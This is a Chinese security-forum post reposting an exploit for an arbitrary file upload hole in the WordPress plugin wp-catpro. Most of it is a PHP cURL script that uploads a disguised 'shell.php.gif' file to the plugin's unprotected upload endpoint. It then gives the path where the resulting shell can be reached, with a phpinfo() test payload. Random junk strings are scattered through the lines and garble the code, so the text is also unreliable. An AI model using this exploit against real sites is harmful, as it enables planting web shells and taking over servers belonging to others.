中国网络渗透测试联盟

标题: WordPress插件wp-catpro任意文件上传 [打印本页]

---

作者: admin    时间: 2013-2-27 20:12
标题: WordPress插件wp-catpro任意文件上传
Wordpress plugins - wp-catpro Arbitrary File Upload Vulnerability
2 J$ D5 C; N6 ]5 s: l6 D#-----------------------------------------------------------------------
$ M7 L: T0 q: y, J
! \: O) K. a' j, b, {作者  => Zikou-16
邮箱 => zikou16x@gmail.com
测试系统 : Windows 7 , Backtrack 5r3
" v- A! i3 d& w0 z0 d3 _- o下载地址 : http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip
, n7 o9 r# n/ \7 Z6 B% Z! ?####
: F  ?! l/ o* a; X
#=> Exploit 信息:
------------------
# 攻击者可以上传 file/shell.php.gif
+ M% [' m+ K) [5 C# ("jpg", "gif", "png")  // Allowed file extensions
# "/uploads/";  // The path were we will save the file (getcwd() may not be reliable and should be tested in your environment)
# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)
/ C" G+ Z0 B7 G$ @7 \------------------

#=> Exploit
-----------
' i/ _' `( e' B" h  Z; D<?php

$uploadfile="zik.php.gif";
$ch = curl_init("http://[ www.2cto.com ]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");
curl_setopt($ch, CURLOPT_POST, true);
" C( @2 D4 E; C* b) B6 f( @% Fcurl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile",
/ O3 {7 t/ @+ j3 K1 l( C% t: r. m'folder'=>'/wp-content/uploads/catpro/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
/ X: c! o( b9 v+ h; X$postResult = curl_exec($ch);
curl_close($ch);

print "$postResult";

Shell Access : http://[ www.xxx.com ]/[path]/wp-content/uploads/catpro/random_name.php.gif
8 e3 f6 l; v  w2 P" ]  ?>
: o7 Q0 T% x; e& h  U6 E<?php
( g1 Z5 G6 y9 _# ]1 _9 O6 z. mphpinfo();
9 w1 b' J; {- i1 r  u?>

---

欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)

Powered by Discuz! X3.2